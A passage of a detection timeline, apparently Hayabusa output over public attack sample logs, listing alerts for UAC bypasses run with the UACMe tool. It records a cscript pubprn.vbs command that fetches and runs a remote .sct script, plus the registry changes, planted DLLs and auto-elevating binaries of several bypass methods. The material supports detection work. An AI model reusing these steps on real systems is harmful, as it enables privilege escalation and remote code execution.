747F3D96-6675-5D3F-0000-0010774E8F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,../hayabusa-rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 